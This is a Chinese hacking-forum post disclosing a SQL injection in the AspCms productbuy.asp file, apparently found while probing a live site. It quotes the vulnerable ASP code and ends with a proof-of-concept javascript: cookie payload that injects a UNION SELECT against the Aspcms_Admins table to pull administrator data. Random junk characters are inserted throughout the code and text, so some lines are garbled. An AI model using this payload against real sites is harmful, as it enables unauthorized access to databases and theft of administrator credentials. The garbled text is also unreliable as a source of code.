好久没上土司了,上来一看发现在删号名单内.....
4 B7 T/ s6 k) }5 q& e- R _$ @也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。7 s, h( m. l" y4 M
废话不多说,看代码:
& E* L+ x% K& [0 P
+ `& W+ _) ~1 Z0 R5 T( }<%
& P* S5 o, S, H9 L$ ~3 F
1 j6 j1 H: a1 M8 z2 o5 d5 yif action = "buy" then
; o$ E8 T0 A; \% r
' S9 k' N. i: H* `! E8 C addOrder(): x' x( b: {" Q7 ~0 ^% W( W6 K/ ?
3 v3 n% M5 a! ^8 e8 S0 |
else
# G" K1 J$ ?$ G. P+ v/ c! o7 F) i1 F+ |- ^3 R( U, x0 \, L
echoContent()
0 \" k/ b& n) X
3 q O+ b9 \# a2 xend if, U9 C7 ?! @4 V$ Y3 x2 c" H4 M$ B4 e6 I
# O+ s6 g2 u) n; s! x! v3 w- @/ q ]: O/ E; P% i7 U
5 A3 W' D4 i4 r- \# j
……略过
# f9 I/ w, d$ T
$ Q* G# h+ j o( t- b+ N. T
6 C0 G2 P) m+ Z6 Y! Q% X, o/ d& O/ N E& A- Q3 X
Sub echoContent()
! }6 p' F" `1 v% Q$ K$ ~, m9 G9 j, G1 p8 [# J. `) U
dim id8 j% v+ d% b1 C/ y7 \6 e% Q
. ^! ] [/ x- a6 t- N: _- c id=getForm("id","get")" U. Q1 ^. ^) ?
% I4 C# V0 ]! `2 Q N5 j- g 7 Y3 h' {$ q8 E+ ?7 k" p
) \- O2 ^* i7 J- O9 P, `* N; Z if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" ' c# j- ]. O8 Z" A: [
4 k3 j% w5 n2 p" q6 D) T
. R6 M$ x$ l+ j$ _7 D$ u4 d
9 C! Q/ X- h$ P
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
! j& H' n/ {5 J c- T7 h+ G& f1 L1 f4 }
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
E$ P9 q1 V; H% i- P. @# r# N1 S
; t4 J7 h" X& Q8 v: M A Dim templatePath,tempStr5 u% W5 [0 j" k
`! o* L2 s% z2 K/ k
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"5 I; B& v3 k) k. p. y- u$ \7 x
. o, B) {* \! h3 p; \0 k3 l }
, A9 x8 L9 j. f8 }. x* @, N( F; I! @
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1"): M$ X8 Y u' }
. K- `2 g& C* `$ H/ K6 ] selectproduct=rsObj(0)
' i. S3 O2 c8 l
) l& k" K; ^) {' a2 |" ~ $ S# B7 Z. W1 X2 o e- e; e
! l& H6 D, b& l# e Dim linkman,gender,phone,mobile,email,qq,address,postcode- W; t/ G6 y& d& ]. @+ X
3 T% P' [+ s# b) m% v9 F( p
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0& _7 ^ e( F, O
: J2 \4 c: x' W) z9 R$ D) U
if rCookie("loginstatus")=1 then 1 d1 I) a2 V2 [4 G
3 N% `9 U! ~- ~% i4 X4 O% F set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
" I$ W5 R3 ]" K
2 G" N# e6 b/ E6 h0 y linkman=rsObj("truename")
9 U7 I7 j* X$ f, h
. J, R1 E9 h- a; |8 D% Z! L+ B$ G" G gender=rsObj("gender")! o4 @2 q) b6 O0 ~; Q
0 D& _5 Q3 X/ \' ~% l2 H; m" Z2 N
phone=rsObj("phone")
/ y& j/ Y. Z1 S1 S; o: c/ y4 k; _( h7 ^
mobile=rsObj("mobile")$ f3 d0 z. U* H0 L3 }
+ Y5 S) u5 N' { email=rsObj("email")
+ G5 N7 r- e9 ]& T
6 x! Q" }8 z& v* {$ r0 _- y qq=rsObj("qq")
$ r7 u, h" Z" e' |' o+ D5 a A4 j1 U2 f; [& _) F
address=rsObj("address")
( e6 g6 ]2 I6 I; j* w j6 ~! i0 J$ A2 o/ q
postcode=rsObj("postcode")9 o4 s: q; M0 y W$ [9 H
3 ]) o' Q. [! k* A5 @
else
. ?! `+ L" w7 ~: B9 O6 y' p" Q r! V) O+ }' c
gender=1( \" Z7 @4 L: r: D
, e9 _: ^8 o0 |: \' Q: p$ J9 Z
end if/ b. t7 [; X: y7 Z5 P
) P0 ]# k- }" c8 E0 a+ g- I
rsObj.close()
" e5 D3 j" U* _8 o4 o; d
$ H) @. t! \6 f( R4 N! ^) ?2 x ) ?1 [$ _! ^* L8 J0 L
3 @/ m/ B4 A; f
with templateObj - K! d* b+ ?; Z
; `( F" E& A, Y# X- o4 p .content=loadFile(templatePath) # J3 e* g7 D" f8 p6 H' W. w
3 q) y8 b' w" `( S .parseHtml()
& K: @8 m5 y# B+ [! S* Q' x" O2 a8 G [" ?! `4 ]5 \, a6 P" N3 \
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
) q. l' A9 \$ s7 M# T! D. T; s7 R- h5 K- Y" h: @+ |7 v6 t
.content=replaceStr(.content,"[aspcms:linkman]",linkman)
$ D% J, q6 r4 u% V
! t5 j8 d0 `+ W- T- d% y .content=replaceStr(.content,"[aspcms:gender]",gender)
) V* d3 |7 I5 g8 P3 W: X5 e
2 j6 w+ L( |; F5 D .content=replaceStr(.content,"[aspcms:phone]",phone) ' P! _* g6 ?. }- i" T' V. Y+ G; A$ I
9 z8 X4 j6 U6 }: n$ O+ s
.content=replaceStr(.content,"[aspcms:mobile]",mobile) 9 O" ^" `9 h2 L
3 q/ l* o) b9 f) _; S .content=replaceStr(.content,"[aspcms:email]",email)
2 \2 p0 K K+ k* O2 E/ f9 D. M% V
2 ?, j! z5 `8 J# { .content=replaceStr(.content,"[aspcms:qq]",qq)
& [7 j6 r. B; G
, T4 x/ T6 e% G. H) q: q4 ? .content=replaceStr(.content,"[aspcms:address]",address) : [# A! z2 M( ?5 D4 k% q
. M0 e1 O8 a: T; F .content=replaceStr(.content,"[aspcms:postcode]",postcode) , g6 M7 H, ~. }
" b1 G# I6 s" o+ Y$ q& ^
.parseCommon()
# H- O. D, `& ^ B' H! }9 l j+ g9 d: v( A6 J5 i
echo .content % L1 W( L4 O7 M% p D- x9 d8 T
9 \" c. l4 M* T/ R; w& R5 T
end with( f+ C; R" M9 T" V
8 o: m. g! x6 X6 ^8 j' n3 x, }* P* ^9 w
set templateobj =nothing : terminateAllObjects# o: p8 A! G5 Q$ }1 V. A
' `5 L5 D# Q0 O' S3 SEnd Sub( ]& t" P- G* I9 S; i7 [
漏洞很明显,没啥好说的. d- p" T# h# G
poc:
" L) G8 |0 A. N# l. {& R) V
; P0 D! }+ c O- g$ \* b, y; Cjavascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
! d4 f' |5 N6 a% J2 t' T
" }& T$ y. n; x7 U3 f |
发表于 2012-12-27 08:35:05
收藏
分享
支持
反对